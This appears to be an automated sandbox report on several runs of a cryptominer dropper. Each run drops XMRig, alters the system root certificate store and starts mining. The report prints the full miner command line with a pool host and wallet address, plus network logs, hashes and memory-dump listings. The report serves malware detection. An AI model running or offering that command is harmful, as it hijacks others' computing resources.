memory/4592-32-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-33-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-34-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-35-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-36-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-37-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-38-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-39-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-40-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-41-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-42-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-43-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-44-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-45-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-46-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-47-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-48-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-49-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-50-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-51-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-52-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-53-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-54-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-55-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-56-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-57-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-58-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-59-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-60-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-61-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-62-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-63-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-64-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-65-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-66-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-67-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-68-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-69-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-70-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-71-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-72-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-73-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-74-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-75-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-76-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-77-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-78-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-79-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-80-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-81-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-82-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-83-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
memory/4592-84-0x00007FF78D540000-0x00007FF78E043000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1809s
Command Line
Signatures
XMRig Miner payload
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (certificate blob elided) | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | N/A |
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3440 wrote to memory of 1780 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3440 wrote to memory of 1780 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4136 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3756 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.178.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.242.123.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:02
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1787s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\main.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3904 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3904 wrote to memory of 1732 | N/A | C:\Users\Admin\AppData\Local\Temp\main.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main.exe
"C:\Users\Admin\AppData\Local\Temp\main.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 19:53
Platform
win10v2004-20240426-en
Max time kernel
1796s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2512 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2512 wrote to memory of 3204 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3208 wrote to memory of 892 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3208 wrote to memory of 892 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/892-16-0x0000016D31650000-0x0000016D31670000-memory.dmp
memory/892-17-0x0000016DC52D0000-0x0000016DC52F0000-memory.dmp
memory/892-18-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-20-0x0000016DC5940000-0x0000016DC5960000-memory.dmp
memory/892-19-0x0000016DC5920000-0x0000016DC5940000-memory.dmp
memory/892-21-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-22-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-25-0x0000016DC5940000-0x0000016DC5960000-memory.dmp
memory/892-24-0x0000016DC5920000-0x0000016DC5940000-memory.dmp
memory/892-23-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-26-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-27-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-28-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-29-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-30-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-31-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-32-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-33-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-34-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-35-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-36-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-37-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-38-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-39-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-40-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-41-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-42-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-43-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-44-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-45-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-46-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-47-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-48-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-49-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-50-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-51-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-52-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-53-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-54-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-55-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-56-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-57-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-58-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-59-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-60-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-61-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-62-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-63-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-64-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-65-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-66-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-67-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-68-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-69-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-70-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-71-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-72-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-73-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-74-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-75-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-76-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-77-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-78-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-79-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-80-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-81-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-82-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-83-0x00007FF696010000-0x00007FF696B13000-memory.dmp
memory/892-84-0x00007FF696010000-0x00007FF696B13000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-05-22 19:05
Reported
2024-05-22 20:01
Platform
win10v2004-20240508-en
Max time kernel
1799s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data not shown] | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1236 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1236 wrote to memory of 2108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 149.177.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.253.116.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2108-16-0x00000257F0970000-0x00000257F0990000-memory.dmp
memory/2108-17-0x00000257F09D0000-0x00000257F09F0000-memory.dmp
memory/2108-18-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-19-0x0000025884C60000-0x0000025884C80000-memory.dmp
memory/2108-20-0x0000025884C40000-0x0000025884C60000-memory.dmp
memory/2108-21-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-22-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-25-0x0000025884C40000-0x0000025884C60000-memory.dmp
memory/2108-24-0x0000025884C60000-0x0000025884C80000-memory.dmp
memory/2108-23-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-26-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-27-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-28-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-29-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-30-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-31-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-32-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-33-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-34-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-35-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-36-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-37-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-38-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-39-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-40-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-41-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
memory/2108-42-0x00007FF78D340000-0x00007FF78DE43000-memory.dmp
